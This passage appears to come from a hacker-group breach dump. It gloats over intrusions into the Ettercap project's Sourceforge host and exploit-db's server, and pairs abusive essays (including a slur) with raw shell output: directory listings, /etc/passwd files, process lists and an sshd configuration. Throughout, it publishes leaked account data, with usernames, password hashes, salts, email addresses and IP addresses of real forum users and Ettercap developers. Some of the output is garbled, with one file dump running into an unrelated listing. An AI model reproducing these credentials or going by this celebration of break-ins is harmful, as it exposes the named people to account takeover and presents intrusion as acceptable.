Jun 29 15:33 newthread.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19932 Jun 29 15:33 online.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8024 Jun 29 15:33 payment_gateway.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12238 Jun 29 15:33 payments.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8217 Jun 29 15:34 picture.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 22368 Jun 29 15:33 picture_inlinemod.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25635 Jun 29 15:34 picturecomment.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27740 Jun 29 15:34 poll.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9840 Jun 29 15:34 posthistory.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 74696 Jun 29 15:34 postings.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6921 Jun 29 15:34 printthread.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 71068 Jun 29 15:34 private.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 22:02 r00tpan3l123lol -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40079 Jun 29 15:35 register.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6015 Jun 29 15:35 report.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 14047 Jun 29 15:35 reputation.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 21274 Jun 29 15:35 sendmessage.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10337 Jun 29 15:36 showgroups.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12716 Jun 29 15:36 showpost.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 73853 Jun 29 15:36 showthread.php dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 signaturepics dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 15:42 smilies -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17014 Jun 29 15:36 spy.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 33204 Jun 29 15:36 subscription.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 13693 Jun 29 15:36 tags.php dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 22 12:03 tech_blue dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_dark dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_white -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9020 Jun 29 15:36 threadrate.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12743 Jun 29 15:36 threadtag.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 34836 Jun 29 15:37 usercp.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19423 Jun 29 15:37 usernote.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29903 Jun 29 15:37 validator.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27705 Jun 29 15:37 visitormessage.php $ cat includes/config.php ob0J%H?EB_&*9z(q7:v%w)j,yx:shell_c99@yahoo.com:122.164.235.10: L0rd CrusAd3r:2685fd80293b5b6cf1a2d2f488b2db72:{pmYzcy%QfgFy0ftJ?_>"F|L42vtcK:lord.v5111@gmail.com:59.92.22.151: Inj3ct0r:170aebb9d6ba17f411e90b931421f703:.Q:eI}"c";[e`?'o6N/al|}RE;-mNU:admin@admin.com:: eidelweiss:cd0c84191f189462696ec6de04a5455b:KNU@c;qRh;j$Qc9Vp+r=:$}mFtE1ZHRD(LW/Uvhj:jimsalimg@msn.com:41.252.59.225: KnocKout:64f26f1e22bba61290603bc8f514a56d:`gXoY<&>G~m02Z)EMJK{*oRa\>8aAr:mmertocan@gmail.com:88.242.249.163: anT!-Tr0J4n:b6f1b2d02236cb9bc983482c5789999c:`dFJd>n&KjhTtynf#L05jSQ%h'=jsl:rnoom_h@yahoo.com:41.191.28.15: ,_._._._._._._._|____________________________________________________ |_|_|_|_|_|_|_|_|___________________________________________________/ ~ ettercap ~ ! You would think that the authors of Ettercap, one of the most popular whitehat pentesting tools, would know the basics of security. Apparently they don't, or they just don't give a shit about what happens to their users. So, why is their website so insecure? Ettercap's message board is hosted at Sourceforge, so they share a server with thousands of other customers. Every single customer is able to execute commands and access the other project directories. Pretty stupid, eh? You only need to find one hole in one hosted site and you can access ALL the project databases. Of course that isn't ALoR's fault, it's Sourceforge's fault. Regardless, people who care about security and data integrity wouldn't use such a shitty provider, would they? To be fair, the Ettercap project is dead. Most of the admins have been inactive for a few years now, but that is no excuse for such a security mess. Especially since the server was compromised some five years ago. Just look at the process list, horrible. Even the worst perl bots (scax) get access. If such a poorly written bot can own this box, everyone can. Some good advice to all other people/projects who are using Sourceforge: Move. There are enough good alternatives. Yes, I am talking to you Vim, get the fuck out of there. And to all Ettercap users: arp poisoning is *not* hacking. If you want to achieve something real, learn the fundamentals and not how to use a GUI. Don't sniff the passwords of your friends and call yourself a pentester (looking at you firesheep). _ _ | | | | ___| |_| |_ ___ _ __ ___ _ __ __ _ __ / _ \ __| __/ _ \ '__/ __| '__|/ \ | '_ \ | __/ |_| || __/ | | (__| | / /\ \ | |_) | \___|\__|\__\___|_| \___|_| /_/ \_\| .__/ | | |_| Baa. I flood SID's I'm a Hacker!! Baa. Baa. Baa. I sit at starbucks I sniff packets | I'm a Hacker!! I'm a Hacker!! | Baa. Baa.. | / \ __ _ | / YOUR ALL FUCKING \ .-.' `; `-._ __ _ __ _ SHEEP. \ (_, .-:' `; `-._.-.:' `; `-._ ,'o"( "HACKE(_, (_, ) (__,-' ,'o"( "HACKE,'o"( "HACKER" )> STOP BEING SHEEP! ( (__,-' (__,-' ) `-'._.--._( ( ) FUCKING INNOVATE! ||| |||`-'._.--._.-' `-'._.--._.-' ||| ||| ||| ||| $ uname -a Linux sfp-web-9.v30.ch3.sourceforge.com 2.6.18-194.11.4.el5 #1 SMP Tue Sep 21 05:04:09 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux $ id uid=48(apache) gid=48(apache) groups=48(apache),302(amqp) $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin sashroot:x:0:500:sashroot:/sashroot:/bin/bash osiris:x:300:300:Osiris Daemon:/var/lib/osiris:/sbin/nologin puppet:x:301:301:Puppet:/var/lib/puppet:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin vhost:*:310:310:Vhost User:/home/vhost:/bin/bash rtstats:*:442:442:RTstats user:/var/local/stats:/bin/bash nginx:x:443:443:Nginx user:/var/lib/nginx:/bin/false nrpe:x:444:446:NRPE user for the NRPE service:/:/sbin/nologin dummy:*:103:103:projectweb dummy user:/home/dummy:/bin/false www:*:448:448:WWW User:/var/www:/bin/bash sfeng:*:333:333:SF Engineer:/home/sfeng:/bin/rbash sfeng2:*:332:332:SF Engineer 2:/home/sfeng2:/bin/bash avahi-autoipd:x:449:449:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin munin:x:450:450:Munin user:/var/lib/munin:/sbin/nologin rrdcached:x:451:451:rrdcached:/var/rrdtool/rrdcached:/sbin/nologin $ ps auxwww USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 10352 80 ? Ss Sep28 0:46 init [3] root 2 0.0 0.0 0 0 ? S< Sep28 1:58 [migration/0] root 3 0.0 0.0 0 0 ? SN Sep28 0:01 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/0] root 5 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/1] root 6 0.0 0.0 0 0 ? SN Sep28 0:48 [ksoftirqd/1] root 7 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/1] root 8 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/2] root 9 0.0 0.0 0 0 ? SN Sep28 0:09 [ksoftirqd/2] root 10 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/2] root 11 0.0 0.0 0 0 ? S< Sep28 0:03 [migration/3] root 12 0.0 0.0 0 0 ? SN Sep28 1:42 [ksoftirqd/3] root 13 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/3] root 14 0.0 0.0 0 0 ? S< Sep28 0:14 [migration/4] root 15 0.0 0.0 0 0 ? SN Sep28 0:02 [ksoftirqd/4] root 16 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/4] root 17 0.0 0.0 0 0 ? S< Sep28 0:20 [migration/5] root 18 0.0 0.0 0 0 ? SN Sep28 0:04 [ksoftirqd/5] root 19 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/5] root 20 0.0 0.0 0 0 ? S< Sep28 0:09 [migration/6] root 21 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/6] root 22 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/6] root 23 0.0 0.0 0 0 ? S< Sep28 0:08 [migration/7] root 24 0.0 0.0 0 0 ? SN Sep28 0:03 [ksoftirqd/7] root 25 0.0 0.0 0 0 ? S< Sep28 0:00 [watchdog/7] root 26 0.0 0.0 0 0 ? S< Sep28 0:00 [events/0] root 27 0.0 0.0 0 0 ? S< Sep28 0:00 [events/1] root 28 0.0 0.0 0 0 ? S< Sep28 0:00 [events/2] root 29 0.0 0.0 0 0 ? S< Sep28 0:00 [events/3] root 30 0.0 0.0 0 0 ? S< Sep28 0:00 [events/4] root 31 0.0 0.0 0 0 ? S< Sep28 0:00 [events/5] root 32 0.0 0.0 0 0 ? S< Sep28 0:00 [events/6] root 33 0.0 0.0 0 0 ? S< Sep28 0:00 [events/7] root 34 0.0 0.0 0 0 ? S< Sep28 0:00 [khelper] root 105 0.0 0.0 0 0 ? S< Sep28 0:00 [kthread] root 116 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/0] root 117 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/1] root 118 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/2] root 119 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/3] root 120 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/4] root 121 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/5] root 122 0.0 0.0 0 0 ? S< Sep28 0:00 [kblockd/6] root 123 0.0 0.0 0 0 ? S< Sep28 0:01 [kblockd/7] root 124 0.0 0.0 0 0 ? S< Sep28 0:00 [kacpid] root 237 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/0] root 238 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/1] root 239 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/2] root 240 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/3] root 241 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/4] root 242 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/5] root 243 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/6] root 244 0.0 0.0 0 0 ? S< Sep28 0:00 [cqueue/7] root 247 0.0 0.0 0 0 ? S< Sep28 0:00 [khubd] root 249 0.0 0.0 0 0 ? S< Sep28 0:00 [kseriod] root 364 0.0 0.0 0 0 ? S Sep28 0:00 [khungtaskd] root 367 0.0 0.0 0 0 ? S< Sep28 29:37 [kswapd0] root 368 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/0] root 369 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/1] root 370 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/2] root 371 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/3] root 372 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/4] root 373 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/5] root 374 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/6] root 375 0.0 0.0 0 0 ? S< Sep28 0:00 [aio/7] root 539 0.0 0.0 0 0 ? S< Sep28 0:00 [kpsmoused] root 618 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_0] root 637 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/0] root 638 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/1] root 639 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/2] root 640 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/3] root 641 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/4] root 642 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/5] root 643 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/6] root 644 0.0 0.0 0 0 ? S< Sep28 0:00 [ata/7] root 645 0.0 0.0 0 0 ? S< Sep28 0:00 [ata_aux] root 664 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_1] root 665 0.0 0.0 0 0 ? S< Sep28 5:14 [usb-storage] root 667 0.0 0.0 0 0 ? S< Sep28 0:00 [scsi_eh_2] root 668 0.0 0.0 0 0 ? S< Sep28 1:45 [usb-storage] root 679 0.0 0.0 0 0 ? S< Sep28 0:00 [kstriped] root 716 0.0 0.0 0 0 ? S< Sep28 0:00 [ksnapd] root 755 0.0 0.0 0 0 ? S< Sep28 30:00 [kjournald] root 780 0.0 0.0 0 0 ? S< Sep28 0:02 [kauditd] root 813 0.0 0.0 12764 168 ? S $ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email, phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank id WHERE user_rank > 0 ORDER BY user_rank NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it: Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor ____________________________________________________|_._._._._._._._, \___________________________________________________|_|_|_|_|_|_|_|_| ! ~ exploit-db ~ Now we come to a different topic. A topic about people who leech off what the scene creates and call it their own. About people who copyright ideas and papers about security related topics that have been around for years. How many XSS-Papers are there currently on exploit-db? How many retarded strcpy(buf, argv[1])-papers are being written over and over again? About whitehats who think releasing exploits would make the world much more safe. And because of fame. They all want fame so badly that they do anything and everything in order to be part of the security industry. What's even more hilarious is that these "famous" security people keep getting owned. We mean el8, phc, h0no, and zf0 have all owned these "Security Rockstar" faggots and yet, nothing changes. Or the attacks are categorized as "skiddy" behavior. It's rediculous how terrible the industry is. There is no accountability anymore. Still there are some lame skids that need a good spanking. Stupid 10 year olds who take perl-exploits to destroy clan-pages for fun and call themselves "hackers" without knowing what they are doing. Criminals who take exploits to steal payment stuff for their own selfish financial gain. And to get their friends thrown in jail (soup). Fame and money... Get the message? $ uname -a Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ pwd /var/www $ ls -la total 24180 drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 . drwxr-xr-x 19 root root 4096 Sep 24 09:26 .. -rw-r--r-- 1 www-data www-data 1005 Nov 12 19:03 .htaccess -rw-r--r-- 1 www-data www-data 764 Nov 5 17:32 .htaccess.save -rw-r--r-- 1 www-data www-data 2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png drwxr-xr-x 4 www-data www-data 4096 Nov 11 07:43 92384723987239847239847234982734 -rw-r--r-- 1 www-data www-data 46149 Nov 11 17:04 apc123456.php -rw-r--r-- 1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2 -rw-r--r-- 1 www-data www-data 18851 Jul 9 14:42 disclosure.html -rw-r--r-- 1 www-data www-data 11662 Nov 11 11:42 dorkorinos.txt drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 edbpartners -rw-r--r-- 1 www-data www-data 1406 Jul 9 14:53 favicon.ico -rw-r--r-- 1 www-data www-data 1921 Jul 9 14:42 feature.txt -rw-r--r-- 1 www-data www-data 1923 Jul 11 16:01 feature1.txt drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 forums drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:41 funny404 -rw-r--r-- 1 www-data www-data 1119 Nov 22 07:45 gd_rss.php -rw-r--r-- 1 www-data www-data 65 Aug 26 04:53 goaway.php -rw-r--r-- 1 www-data www-data 53 Jul 9 14:42 googled6c4817aa45e0032.html -rw-r--r-- 1 www-data www-data 5 Nov 11 07:24 hola.txt -rw-r--r-- 1 www-data www-data 3154634 Nov 11 07:25 hola.xml drwxr-xr-x 15 www-data www-data 4096 Nov 22 15:50 images -rw-r--r-- 1 www-data www-data 397 Aug 26 04:53 index.php drwxr-xr-x 2 www-data www-data 4096 Nov 4 12:20 leetdownloads -rw-r--r-- 1 www-data www-data 311 Nov 12 18:40 maintenance.php drwxr-xr-x 2 root root 4096 Nov 26 10:18 movies -rw-r--r-- 1 www-data www-data 106 Aug 26 04:53 news.php drwxr-xr-x 2 www-data www-data 4096 Nov 11 17:20 nginx-default -rw-r--r-- 1 www-data www-data 220 Oct 30 17:00 pagerank.html -rw-r--r-- 1 www-data www-data 761 Sep 6 06:12 rating.txt -rw-r--r-- 1 www-data www-data 9122 Aug 18 05:32 readme.html -rw-r--r-- 1 www-data www-data 47 Jul 9 14:53 robots_ssl.txt -rw-r--r-- 1 www-data www-data 4007150 Dec 1 07:47 ror.xml -rw-r--r-- 1 www-data www-data 2102 Sep 1 05:40 rss.php drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 scripts -rw-r--r-- 1 www-data www-data 1056 Sep 3 18:05 search-mobile.php -rw-r--r-- 1 www-data www-data 108 Aug 26 04:53 search.php -rw-r--r-- 1 www-data www-data 3337393 Dec 1 07:47 sitemap.xml -rw-r--r-- 1 www-data www-data 3462 Aug 19 11:37 sitemap.xsl -rw-r--r-- 1 www-data www-data 30533 Nov 30 17:52 sitemap_blog.xml -rw-r--r-- 1 www-data www-data 4229 Nov 30 17:52 sitemap_blog.xml.gz drwxr-xr-x 3 www-data www-data 4096 Jul 9 14:42 slider drwxr-xr-x 2 www-data www-data 20480 Dec 4 09:18 sploits -rw-r--r-- 1 www-data www-data 9621 Nov 3 19:52 style.css drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:40 testme -rw-r--r-- 1 www-data www-data 5699 Nov 4 07:22 tpl_search.php -rw-r--r-- 1 www-data www-data 16 Nov 28 06:52 update-982374.txt -rw-r--r-- 1 www-data www-data 50 Aug 26 04:53 updated.php drwxr-xr-x 3 www-data www-data 4096 Aug 3 09:35 videos -rw-r--r-- 1 www-data www-data 4391 Aug 26 04:53 wp-activate.php drwxr-xr-x 8 www-data www-data 4096 Nov 11 17:59 wp-admin -rw-r--r-- 1 www-data www-data 40284 Aug 26 04:53 wp-app.php -rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-atom.php -rw-r--r-- 1 www-data www-data 274 Aug 26 04:53 wp-blog-header.php -rw-r--r-- 1 www-data www-data 3926 Aug 26 04:53 wp-comments-post.php -rw-r--r-- 1 www-data www-data 238 Aug 26 04:53 wp-commentsrss2.php -rw-r--r-- 1 www-data www-data 3173 Aug 26 04:53 wp-config-sample.php -rw-r--r-- 1 www-data www-data 2832 Nov 11 17:59 wp-config.php drwxr-xr-x 8 www-data www-data 4096 Dec 3 22:49 wp-content -rw-r--r-- 1 www-data www-data 1255 Aug 26 04:53 wp-cron.php -rw-r--r-- 1 www-data www-data 240 Aug 26 04:53 wp-feed.php drwxr-xr-x 7 www-data www-data 4096 Sep 8 13:52 wp-includes -rw-r--r-- 1 www-data www-data 2002 Aug 26 04:53 wp-links-opml.php -rw-r--r-- 1 www-data www-data 2441 Aug 26 04:53 wp-load.php -rw-r--r-- 1 www-data www-data 26160 Sep 3 21:48 wp-login.php -rw-r--r-- 1 www-data www-data 7774 Aug 26 04:53 wp-mail.php -rw-r--r-- 1 www-data www-data 487 Aug 26 04:53 wp-pass.php -rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rdf.php -rw-r--r-- 1 www-data www-data 316 Aug 26 04:53 wp-register.php -rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rss.php -rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-rss2.php -rw-r--r-- 1 www-data www-data 9177 Sep 8 13:01 wp-settings.php -rw-r--r-- 1 www-data www-data 18695 Aug 26 04:53 wp-signup.php -rw-r--r-- 1 www-data www-data 3702 Aug 26 04:53 wp-trackback.php -rw-r--r-- 1 www-data www-data 93955 Aug 26 04:53 xmlrpc-orig.php -rw-r--r-- 1 www-data www-data 94184 Aug 26 04:53 xmlrpc.php $ cat wp-config.php boot/initrd.img-2.6.32-26-server lrwxrwxrwx 1 root root 32 Oct 4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server drwxr-xr-x 13 root root 12288 Nov 18 06:54 lib lrwxrwxrwx 1 root root 4 Jul 9 05:28 lib64 -> /lib drwx------ 2 root root 16384 Jul 9 05:28 lost+found drwxr-xr-x 2 root root 4096 Jul 9 15:17 maint drwxr-xr-x 3 root root 4096 Jul 9 05:28 media drwxr-xr-x 4 root root 4096 Jul 9 20:03 mnt drwxr-xr-x 3 root root 4096 Oct 7 16:53 opt dr-xr-xr-x 227 root root 0 Nov 11 10:45 proc drwx------ 9 root root 4096 Nov 25 09:08 root drwxr-xr-x 2 root root 4096 Oct 29 19:00 sbin drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux drwxr-xr-x 2 root root 4096 Jul 9 05:28 srv drwxr-xr-x 13 root root 0 Nov 11 10:45 sys drwxrwxrwt 3 root root 4096 Dec 4 14:59 tmp drwxr-xr-x 10 root root 4096 Jul 9 05:28 usr drwxr-xr-x 19 root root 4096 Sep 24 09:26 var lrwxrwxrwx 1 root root 29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server lrwxrwxrwx 1 root root 29 Oct 4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin landscape:x:103:108::/var/lib/landscape:/bin/false mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false emgent:x:1003:1002:,,,:/home/emgent:/bin/bash ossec:x:1004:1003::/var/ossec:/bin/false ossecm:x:1005:1003::/var/ossec:/bin/false ossecr:x:1006:1003::/var/ossec:/bin/false $ cat /etc/issue Ubuntu 10.04.1 LTS \n \l $ cat /etc/ssh/sshd_config # Package generated configuration file # See the sshd_config(5) manpage for details # What ports, IPs and protocols we listen for Port 22 # Use these options to restrict which interfaces/protocols sshd will bind to #ListenAddress :: #ListenAddress 0.0.0.0 Protocol 2 # HostKeys for protocol version 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_dsa_key #Privilege Separation is turned on for security UsePrivilegeSeparation yes # Lifetime and size of ephemeral version 1 server key KeyRegenerationInterval 3600 ServerKeyBits 768 # Logging SyslogFacility AUTH LogLevel INFO # Authentication: LoginGraceTime 120 PermitRootLogin yes StrictModes yes RSAAuthentication yes PubkeyAuthentication yes #AuthorizedKeysFile %h/.ssh/authorized_keys # Don't read the user's ~/.rhosts and ~/.shosts files IgnoreRhosts yes # For this to work you will also need host keys in /etc/ssh_known_hosts RhostsRSAAuthentication no # similar for protocol version 2 HostbasedAuthentication no # Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication #IgnoreUserKnownHosts yes # To enable empty passwords, change to yes (NOT RECOMMENDED) PermitEmptyPasswords no # Change to yes to enable challenge-response passwords (beware issues with # some PAM modules and threads) ChallengeResponseAuthentication no # Change to no to disable tunnelled clear text passwords PasswordAuthentication yes # Kerberos options #KerberosAuthentication no #KerberosGetAFSToken no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCredentials yes X11Forwarding yes X11DisplayOffset 10 PrintMotd no PrintLastLog yes TCPKeepAlive yes #UseLogin no #MaxStartups 10:30:60 #Banner /etc/issue.net # Allow client to pass locale environment variables AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server # Set this to 'yes' to enable PAM authentication, account processing, # and session processing. If this is enabled, PAM authentication will # be allowed through the ChallengeResponseAuthentication and # PasswordAuthentication. Depending on your PAM configuration, # PAM authentication via ChallengeResponseAuthentication may bypass # the setting 